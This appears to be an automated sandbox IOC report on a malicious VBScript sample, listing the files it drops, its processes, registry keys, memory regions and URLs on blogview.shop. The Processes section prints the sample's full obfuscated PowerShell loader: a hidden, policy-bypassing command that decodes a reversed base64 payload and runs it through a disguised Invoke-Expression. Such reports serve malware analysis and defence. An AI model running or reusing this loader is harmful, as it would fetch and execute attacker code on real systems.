IOC Report
FJw9llPHsk.vbs

loading gif

Files

File Path
Type
Category
Malicious
FJw9llPHsk.vbs
ASCII text, with very long lines (1397), with CRLF, LF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eeuyqkc4.bcf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tatqkyd4.hi5.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FJw9llPHsk.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '==Qf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://blogview.shop/api/values/86718771597555964672/refresh6/X
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://go.microsoft.co
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://blogview.shop/api/values/refresh6
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://blogview.shop/api/values/
unknown
https://contoso.com/License
unknown
https://blogview.shop/api/values/86718771597555964672/refresh6/
unknown
https://blogview.shop/api/values/86718771597555964672/refresh6/7045193862.txt
unknown
https://contoso.com/Icon
unknown
https://aka.ms/pscore68
unknown
https://blogview.shop/api/values/refresh6X
unknown
https://blogview.shop
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 9 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
blogview.shop
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1421FA0E000
trusted library allocation
page read and write
malicious
3B256FE000
stack
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
14237D70000
heap
page read and write
1421F785000
heap
page read and write
1421F715000
heap
page read and write
142211EE000
trusted library allocation
page read and write
3B265CE000
stack
page read and write
1421FD1F000
trusted library allocation
page read and write
3B2577E000
stack
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
3B2597D000
stack
page read and write
1421F75B000
heap
page read and write
3B257FF000
stack
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
11A8A820000
heap
page read and write
1422071F000
trusted library allocation
page read and write
7FFD9B91A000
trusted library allocation
page read and write
1422F997000
trusted library allocation
page read and write
1421F536000
heap
page read and write
1421F530000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
14237C67000
heap
page execute and read and write
7FFD9BA50000
trusted library allocation
page read and write
11A88A55000
heap
page read and write
13D0AF7000
stack
page read and write
14237E06000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
3B2557E000
stack
page read and write
1422F854000
trusted library allocation
page read and write
1421DCC0000
heap
page read and write
3B251EE000
stack
page read and write
14237DC5000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9B810000
trusted library allocation
page read and write
14237DC2000
heap
page read and write
14220E38000
trusted library allocation
page read and write
1421F7D0000
heap
page execute and read and write
1421DC80000
heap
page readonly
1421F680000
heap
page read and write
142211F4000
trusted library allocation
page read and write
13D0DFE000
stack
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
3B255FC000
stack
page read and write
1421FC1C000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
3B2567E000
stack
page read and write
14237C60000
heap
page execute and read and write
1421DCCE000
heap
page read and write
1421DC20000
heap
page read and write
1421F545000
heap
page read and write
11A88970000
heap
page read and write
14237BE0000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
1422F7E1000
trusted library allocation
page read and write
1421DADD000
heap
page read and write
3B2547E000
stack
page read and write
1422117A000
trusted library allocation
page read and write
1421DAD7000
heap
page read and write
1421DA59000
heap
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
1421D9E0000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1421DC70000
trusted library allocation
page read and write
11A88BE0000
heap
page read and write
7FFD9B77B000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9B942000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
1422F7F0000
trusted library allocation
page read and write
142210D2000
trusted library allocation
page read and write
1421F866000
trusted library allocation
page read and write
7FFD9B7BC000
trusted library allocation
page execute and read and write
3B258FE000
stack
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
1421DA00000
heap
page read and write
13D06FE000
stack
page read and write
13D05FE000
stack
page read and write
7FFD9B960000
trusted library allocation
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
1421F73F000
heap
page read and write
1421DA50000
heap
page read and write
3B25B7E000
stack
page read and write
11A88990000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
3B2587F000
stack
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1421F6D4000
heap
page read and write
11A88A24000
heap
page read and write
13D0EFB000
stack
page read and write
7FFD9BA30000
trusted library allocation
page read and write
13D04FA000
stack
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7DF4E9D10000
trusted library allocation
page execute and read and write
7FFD9B762000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
14237E18000
heap
page read and write
1421DC90000
trusted library allocation
page read and write
1421FD1A000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1421DC50000
trusted library allocation
page read and write
13D0CFE000
stack
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B764000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
3B25BFB000
stack
page read and write
7FFD9B816000
trusted library allocation
page read and write
1421F4A0000
trusted library allocation
page read and write
1421DA9A000
heap
page read and write
1421F690000
heap
page read and write
1421D9D0000
heap
page read and write
1421DA8F000
heap
page read and write
3B25A7F000
stack
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
11A88C40000
heap
page read and write
1421F470000
trusted library allocation
page read and write
1421DA9E000
heap
page read and write
13D09FF000
stack
page read and write
14237DD1000
heap
page read and write
1421F7E1000
trusted library allocation
page read and write
13D0BFD000
stack
page read and write
13D08FE000
stack
page read and write
3B254FE000
stack
page read and write
1421F7B0000
heap
page execute and read and write
3B251A3000
stack
page read and write
11A88C45000
heap
page read and write
1421F6D2000
heap
page read and write
1421DCC5000
heap
page read and write
7FFD9B911000
trusted library allocation
page read and write
1421F753000
heap
page read and write
1422FACE000
trusted library allocation
page read and write
1421DB47000
heap
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
7FFD9B900000
trusted library allocation
page read and write
11A889B0000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
14237DFE000
heap
page read and write
14237E15000
heap
page read and write
14237C90000
heap
page read and write
14237DAB000
heap
page read and write
1421DAB0000
heap
page read and write
14221348000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1421DAD9000
heap
page read and write
1421FC55000
trusted library allocation
page read and write
11A88960000
heap
page read and write
There are 142 hidden memdumps, click here to show them.